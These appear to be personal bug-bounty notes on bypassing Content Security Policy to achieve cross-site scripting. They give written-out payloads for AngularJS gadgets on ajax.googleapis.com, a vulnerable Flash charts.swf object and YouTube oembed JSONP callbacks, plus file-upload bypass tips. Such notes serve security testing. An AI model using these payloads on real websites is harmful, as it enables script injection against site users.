[CSP HEADER BYPASS]
CSP: content security policy | It's a way to restrict what is allowed in the application Notes: 1. 'self' means it allows from same domain. 2. CSP policy is defined in the response header, this is how browser knows the CSP policy is in place 3. use the dev tools when testing and inspect using the console tab to see if any 'alert' notification pop-up. 4. you can check also inspecting the HTML code and check for the meta tag 5. it is pretty important to analyze what tags are allowed, so they are abused 6.bypass via ajax.googleapis.com
sample: content-security-policy: script-src 'self' ajax.googleapis.com payload:<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angularjs/1.6.6/angular.min.js"></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>ng-app: enables angular js usage ng-csp: enables angular js CSP mode ng-click: enables angular js click method explanation: Basically the div is enabling some features (ng-app / ng-csp / ng-click) so it can be used by angular js as 'ajax.googleapis.com' is allowed. As the div is calling angular it is needed to import the library to use the functions to call more actions. async ;source is allowing the automatic interaction needed to pop-up the click event.bypass via flash file
sample: content-security-policy: script-src 'self' payload:<object type='application/x-shockwave-flash' data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowed Domain=\%22})))}catch(e) {alert(/XSS/)}//'><param name='AllowScriptAccess' value='always'></object>Notes: 1. This content security policy only allows scripts from the same domain itself. 2. It is only restricting scripts, but how about flash files ? ajax.googleapis.com is not explicitely allowed, however, via flash files it can be call it. 3. Each time you want to try flash csp by pass you need to use the HTML tag 'object' 4. 'charts.swf' is a vulnerable flash file to XSS, if not working, you can set your own or find other to trigger XSS.bypass via polyglot file
sample: content-security-policy: default-src 'self'bypass via angularJS
bypass via JSONP
JSONP means json with padding is just a method to retrieve json data from a differnet domain, normally is accomplished by dynamic script tag and also is subject to the same origin policy. when you use this method you use a callback function method in the query parameters for the url and the callback function will retrieve the data. so using this method you will not be blocked by the csp policy restriction. this is normally achieved when the csp policy is allowing third party urls or domains to get data from. like https://www.google.com or https://www.youtube.com samples: > first link will show the raw data in json format, you need to use the callback oembeb feature and you need to select the youtube video you want to retrieve, remember that data is not critical, however is a way to trigger other functions like alert() to discover XSS. https://youtube.com/oembed?url=https://www.youtube.com/watch?v=bQki6llaaTs > second link will show you how to use the callback to use functions, https://youtube.com/oembed?url=https://www.youtube.com/watch?v=bQki6llaaTs&callback=test() > third link is actually the suspicious trigger <script/src x=https://www.youtube.com/oembed?url=https://www.youtube.com/watch?v=bQki6llaaTs&callback=alert(1)></script>bypass via fileupload
-nahamsec's way- first thing is that only work if the file upload is allowed on the csp policy. it is needed to recognize the csp policy, if it is script-src 'self' this technique will work. it will be needed to inspect the traffic with dev tools to see if the files are loaded or not. if the csp policy is script-src 'self' you can use the same domain on the on the vuln field to trigger the script tag. two good tips are to check on dev tools: -network tab -console tab if you discover that you can upload files, you can intercept the request and chage the extention, the content type or the magic bytes in order to test if another file can be uploaded.
©® - Since 2023